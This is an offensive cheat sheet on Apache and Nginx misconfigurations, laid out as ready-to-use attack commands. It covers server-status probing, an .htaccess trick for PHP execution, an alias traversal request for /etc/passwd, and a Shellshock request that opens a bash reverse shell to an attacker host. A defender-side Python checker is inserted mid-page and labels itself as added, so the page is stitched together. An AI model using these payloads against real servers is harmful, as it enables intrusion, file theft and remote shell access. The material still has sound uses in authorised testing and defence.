Apache / Nginx Misconfigs
What it is: The two most popular web servers on the internet. Apache serves ~30% and Nginx ~34% of all websites. Misconfigurations like exposed server-status, .htaccess abuse, alias traversal, and Shellshock are the main attack vectors.
Default ports: 80, 443, 8080
Vuln research:
- Apache CVEs — CVE Details
- Nginx CVEs — CVE Details
- SearchSploit: searchsploit apache / searchsploit nginx
- HackTricks — Apache
Apache server-status exposure
Reveals active connections and URLs — Information disclosure
curl http://$IP/server-status
curl http://$IP/server-info
Apache .htaccess tricks
If you can upload .htaccess — Execute arbitrary extensions as PHP
# Upload .htaccess with:
AddType application/x-httpd-php .txt
# Now any .txt file executes as PHP
Nginx alias traversal
Misconfigured alias directive (location prefix has no trailing slash, alias path does) — Path traversal to read files outside the aliased directory
# If config has: location /files { alias /var/www/files/; }
curl http://$IP/files../etc/passwd
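A defender-side check for the alias pattern above, as an added example that is not part of the original page: it scans nginx configuration text for a location prefix without a trailing slash paired with an alias that has one, and shows where `<location>../` resolves. The sample config, the regex-based parsing and the function names are assumptions made for illustration.

```python
import posixpath
import re

# Constructed sample config (not from the original page): /files is the
# misconfigured pattern, /static/ is the corrected form, /img has no slashes.
SAMPLE_CONF = """
server {
    location /files {
        alias /var/www/files/;
    }
    location /static/ {
        alias /var/www/static/;
    }
    location /img {
        alias /var/www/img;
    }
}
"""

# Prefix location (optionally with ^~) followed by an alias in the same block.
# Simplification: does not handle nested blocks or braces inside comments.
LOCATION_ALIAS = re.compile(
    r"location\s+(?:\^~\s+)?(/[^\s{]*)\s*\{[^{}]*?\balias\s+([^;\s]+)\s*;",
    re.S,
)

def resolve(location, alias, uri):
    """Map a URI to a file path the way a prefix location with alias does:
    the matched location prefix is replaced by the alias string."""
    return posixpath.normpath(alias + uri[len(location):])

def find_alias_traversal(conf_text):
    """Return (location, alias, escaped_path) for each pair where the
    location lacks a trailing slash but the alias ends with one."""
    findings = []
    for location, alias in LOCATION_ALIAS.findall(conf_text):
        if alias.endswith("/") and not location.endswith("/"):
            # "<location>../" still matches the prefix, so the remainder
            # "../" is appended to the alias and climbs one directory.
            escaped = resolve(location, alias, location + "../")
            findings.append((location, alias, escaped))
    return findings

if __name__ == "__main__":
    for loc, alias, escaped in find_alias_traversal(SAMPLE_CONF):
        print(f"location {loc} + alias {alias}: '{loc}../' resolves to {escaped}")
```

Writing the block as `location /files/` clears the finding. For the config shown above, `/files../etc/passwd` resolves to `/var/www/etc/passwd`, so the exposure is the parent directory of the alias target.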
Apache mod_cgi shellshock (CVE-2014-6271)
RCE via CGI scripts — If /cgi-bin/ scripts exist
gobuster dir -u http://$IP/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -x sh,cgi,pl
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/$LHOST/4444 0>&1" http://$IP/cgi-bin/script.sh
Check for default pages and info
Quick info gathering on web servers
nikto -h http://$IP
# Check: /phpinfo.php, /info.php, /.git/, /.env